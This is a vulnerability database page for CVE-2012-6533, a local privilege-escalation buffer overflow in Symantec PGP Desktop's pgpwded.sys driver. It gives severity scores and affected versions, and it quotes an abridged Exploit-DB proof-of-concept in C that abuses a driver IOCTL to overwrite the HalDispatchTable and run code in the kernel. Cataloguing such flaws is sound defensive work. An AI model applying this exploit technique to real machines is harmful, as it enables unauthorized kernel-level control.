CVE-2012-6533 : Detail

CVE-2012-6533

Overflow
0.06%V3
Local
2013-02-18
11h00 +00:00
2024-09-17
03h22 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in pgpwded.sys in Symantec PGP Desktop 10.x and Encryption Desktop 10.3.0 before MP1 on Windows XP and Server 2003 allows local users to gain privileges via a crafted application.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.4 AV:L/AC:M/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 38299

Publication date : 2012-02-24 23h00 +00:00
Author : Nikita Tarakanov
EDB Verified : Yes

source: https://www.securityfocus.com/bid/57835/info Symantec Encryption Desktop is prone to a local buffer-overflow vulnerability. A local attacker may exploit this issue to execute arbitrary code with escalated privileges. #define IO_CONTROL_VULN 0x80022058 #define TARGET_DEVICE L"\\Device\\pgpwdef" [..] usName.Buffer = TARGET_DEVICE; usName.Length = usName.MaximumLength = (USHORT)(wcslen(usName.Buffer) * sizeof(WCHAR)); InitializeObjectAttributes(&ObjAttr, &usName, OBJ_CASE_INSENSITIVE , NULL, NULL); // get handle of target devide ns = f_NtOpenFile( &hDev, FILE_READ_DATA | FILE_WRITE_DATA | SYNCHRONIZE, &ObjAttr, &StatusBlock, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_SYNCHRONOUS_IO_NONALERT ); [..] BOOL bStatus = DeviceIoControl( hDev, IO_CONTROL_VULN, InBuff, 0x8, OutBuff, 0x8, &dwReturnLen, NULL ); dwReturnLen = 0; bStatus = DeviceIoControl( hDev, IO_CONTROL_VULN, InBuff, sizeof(PVOID), (PUCHAR)m_HalDispatchTable, 0, &dwReturnLen, NULL ); [..] f_NtQueryIntervalProfile(ProfileTotalIssues, &Interval); [..] Your evil code processes with CPL==0

Products Mentioned

Configuraton 0

Symantec>>Pgp_desktop >> Version 10.0.0

Symantec>>Pgp_desktop >> Version 10.0.1

Symantec>>Pgp_desktop >> Version 10.0.2

Symantec>>Pgp_desktop >> Version 10.0.3

Symantec>>Pgp_desktop >> Version 10.1.0

Symantec>>Pgp_desktop >> Version 10.1.1

Symantec>>Pgp_desktop >> Version 10.1.2

Symantec>>Pgp_desktop >> Version 10.2.0

Symantec>>Pgp_desktop >> Version 10.2.1

Microsoft>>Windows_2003_server >> Version *

Microsoft>>Windows_xp >> Version *

Configuraton 0

Symantec>>Encryption_desktop >> Version 10.3.0

References

http://www.securityfocus.com/bid/57835
Tags : vdb-entry, x_refsource_BID